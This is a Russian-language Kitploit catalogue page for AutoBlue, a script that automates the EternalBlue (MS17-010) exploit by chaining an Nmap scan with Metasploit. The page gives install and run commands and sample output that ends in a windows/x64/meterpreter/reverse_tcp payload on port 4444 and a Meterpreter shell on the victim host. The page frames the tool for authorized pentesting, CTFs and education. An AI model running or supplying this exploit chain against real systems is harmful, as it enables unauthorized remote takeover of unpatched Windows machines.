Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
autoblue — AutoBlue — автоматизированный инструмент эксплуатации EternalBlue (CVE-2017-0144 / MS17-010), использующий Nmap и Metasploit для этичного взлома, тестирования на проникновение и CTF-задач. Только для авторизованного и образовательного использования! | Kitploit
Инструменты/GitHubGitHub/atithkhawas/autoblue
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияПост-эксплуатацияCTFТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue — автоматизированный инструмент эксплуатации EternalBlue (CVE-2017-0144 / MS17-010), использующий Nmap и Metasploit для этичного взлома, тестирования на проникновение и CTF-задач. Только для авторизованного и образовательного использования!

Репозиторий
4131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

AUTOBLUE: Автоматизированный инструмент для эксплуатации уязвимости EternalBlue

AUTOBLUE — это инструмент автоматизации, предназначенный для эксплуатации уязвимости EternalBlue (CVE-2017-0144) на машинах Windows. Инструмент объединяет возможности Nmap для сканирования уязвимостей и Metasploit's msfconsole для эксплуатации, позволяя пользователям автоматически выявлять уязвимые системы и запускать эксплойт EternalBlue для получения удаленного доступа к цели.

Этот инструмент в первую очередь предназначен для специалистов по безопасности, пентестеров и этичных хакеров, работающих в контролируемых, авторизованных средах, таких как задачи Capture The Flag (CTF), тестирование на проникновение или лабораторные настройки. AUTOBLUE позволяет пользователям эксплуатировать уязвимость EternalBlue с минимальным ручным вмешательством — достаточно просто ввести IP-адрес цели.

Возможности

  • Автоматизированное сканирование уязвимостей: Использует Nmap для поиска уязвимости EternalBlue (CVE-2017-0144) на целевой машине.

  • Бесшовная эксплуатация: Использует Metasploit's msfconsole для автоматического запуска эксплойта EternalBlue.

  • Простая настройка: Требуется только IP-адрес цели и рабочая среда с установленными Nmap и Metasploit.

  • Отчет о результатах: Генерирует вывод, указывающий на успех или неудачу попытки эксплуатации.

Содержание

  • Предварительные требования
  • Установка
  • Использование
  • Как это работает
  • Соображения безопасности
  • Вклад в проект
  • Лицензия
  • Благодарности
  • Отказ от ответственности
  • Предварительные требования:

    Перед использованием AUTOBLUE убедитесь, что на вашей машине установлены следующие инструменты:

    Nmap: Инструмент для сканирования сети, чтобы обнаруживать уязвимые машины.

    Metasploit Framework: Платформа для тестирования на проникновение, содержащая эксплойты для EternalBlue.

    Установка Nmap:

    • В Linux (на основе Debian):

    Копировать код

    root@kitploit:~
          sudo apt update
    

    и

    root@kitploit:~
          sudo apt install nmap
    

    В Windows или macOS загрузите Nmap с официального сайта.

    Установка Metasploit:

    В Linux (на основе Debian):

    Копировать код

    root@kitploit:~
          sudo apt update
    

    и

    root@kitploit:~
         sudo apt install metasploit-framework
         
    

    В Windows или macOS загрузите Metasploit с официального сайта.

    Установка:

    Чтобы установить AUTOBLUE, выполните следующие шаги:

    • Клонируйте репозиторий:

      root@kitploit:~
        git clone https://github.com/AtithKhawas/autoblue.git
      

      и

      root@kitploit:~
           cd autoblue
      

    Убедитесь, что Nmap и Metasploit правильно установлены как предварительные требования.

    • Сделайте скрипт исполняемым:

      root@kitploit:~
      chmod +x autoblue.sh
      

    Использование:

    AUTOBLUE предназначен для автоматизации сканирования и эксплуатации уязвимости EternalBlue. Вот как его использовать:

    • Запустите инструмент

    Чтобы использовать AUTOBLUE, выполните следующую команду в терминале:

    Копировать код

    root@kitploit:~
         ./autoblue.sh 
    

    Вывод:

    root@kitploit:~
         ┌──(root㉿kali)-[/home/Elliot] 
         └─# ./autoblue.sh 
         ============================================
         ********************************************
         AutoBlue    - EternalBlue Exploit Automation
         ********************************************
         ********************************************
         ------------------------Made by ATITH KHAWAS
         ============================================
         Enter Target IP Address:
    

    Будет запрошен IP-адрес цели и ваш IP-адрес.

    Пример

    root@kitploit:~
          Enter Target IP Address: Target<IP Address>
          Enter Your IP Address: Your <IP Address>
    

    После запуска инструмента начнется сканирование с помощью Nmap:

    Вывод-1

    root@kitploit:~
     Target IP Address: ***.***.**.**
     [+] Scanning Target for MS17-010 Vulnerability...
     Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
     Nmap scan report for ***.***.**.**
     Host is up (0.19s latency).
    
     PORT    STATE SERVICE
     445/tcp open  microsoft-ds
    
     Host script results:
     | smb-vuln-ms17-010: 
     |   VULNERABLE:
     |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
     |     State: VULNERABLE
     |     IDs:  CVE:CVE-2017-0143
     |     Risk factor: HIGH
     |       A critical remote code execution vulnerability exists in Microsoft SMBv1
     |        servers (ms17-010).
     |           
     |     Disclosure date: 2017-03-14
     |     References:
     |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
     |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
     |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    
     Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
     [+] Target is VULNERABLE to EternalBlue!
    

    Здесь начинается настоящая работа, значительно сокращающая трудоемкий процесс. Если цель уязвима, автоматически запускается Msfconsole и устанавливаются RHOSTS, PAYLOAD, LHOST и LPORT с портом по умолчанию 4444.

    Вывод-2

    root@kitploit:~
          [+] Launching Metasploit...
          [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
          RHOSTS => ***.***.**.**
          PAYLOAD => windows/x64/meterpreter/reverse_tcp
          LHOST => ***.***.**.**
          LPORT => 4444
          [*] Started reverse TCP handler on ***.***.**.**:4444 
    

    И предоставляет нам оболочку Meterpreter цели.

    Вывод-3

    root@kitploit:~
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
           meterpreter > pwd
           C:\Windows\system32
    

    Как это работает:

    • Сканирование с помощью Nmap Script: Инструмент сначала использует Nmap Script Scan (--script smb-vuln-ms17-010) для обнаружения, уязвима ли целевая машина к эксплойту EternalBlue. Он проверяет, открыт ли порт 445, и пытается выявить уязвимости SMB.

    • Эксплойт Metasploit: Если целевая машина найдена уязвимой, AUTOBLUE переходит к запуску эксплойта EternalBlue с помощью Metasploit's msfconsole. Скрипт настраивает и отправляет необходимый пейлоуд для эксплуатации уязвимости.

    • Обратная оболочка: Если эксплойт успешен, открывается обратная оболочка, предоставляющая интерфейс командной строки на машине жертвы.

    • Обратная связь: Инструмент предоставляет обратную связь в процессе работы, включая информацию о том, была ли цель успешно эксплуатирована, и выводит любые соответствующие сведения (например, IP-адрес обратной оболочки).

    Соображения безопасности:

    • Законное использование: Этот инструмент следует использовать только в авторизованных средах. Убедитесь, что у вас есть явное разрешение на тестирование целевой машины и что это не запрещено законом в вашей юрисдикции.

    • Пользовательский ввод: Убедитесь, что в инструмент вводятся только доверенные IP-адреса, чтобы предотвратить неправильное использование. Запуск этого инструмента на недоверенных системах может привести к инцидентам безопасности.

    • Безопасность пейлоуда: Пейлоуд обратной оболочки, используемый в этом инструменте, по своей сути рискован. Не подвергайте атакующую машину или ее слушатели воздействию недоверенных сетей.

    • Обновляйте зависимости: Регулярно обновляйте Nmap и Metasploit, чтобы смягчить известные уязвимости безопасности в этих инструментах.

    Вклад в проект:

    Вклад в проект AUTOBLUE приветствуется. Если у вас есть предложения, улучшения или исправления ошибок, не стесняйтесь форкать репозиторий и создавать запрос на слияние.

    Лицензия:

    Этот инструмент является открытым исходным кодом и распространяется под лицензией MIT. Вы можете свободно использовать, изменять и распространять программное обеспечение в своих проектах. Однако вы должны включить это уведомление во все копии или существенные части программного обеспечения.

    Благодарности:

    • Nmap: За предоставление функциональности сканирования уязвимостей.

    • Metasploit: За предоставление платформы для эксплуатации уязвимости EternalBlue.

    • Исследователи безопасности: За обнаружение и публичное раскрытие уязвимости EternalBlue, что помогло защитить системы по всему миру.

    Отказ от ответственности:

    AUTOBLUE — это инструмент, предназначенный только для образовательного и этического использования. Авторы не несут ответственности за любые незаконные действия, совершенные с использованием этого инструмента. Ваша обязанность — убедиться, что у вас есть явное разрешение на проведение тестов на проникновение в любой системе.

    Используйте этот инструмент на свой страх и риск. Всегда проводите тестирование на проникновение в безопасной и законной среде.

    Скачать инструмент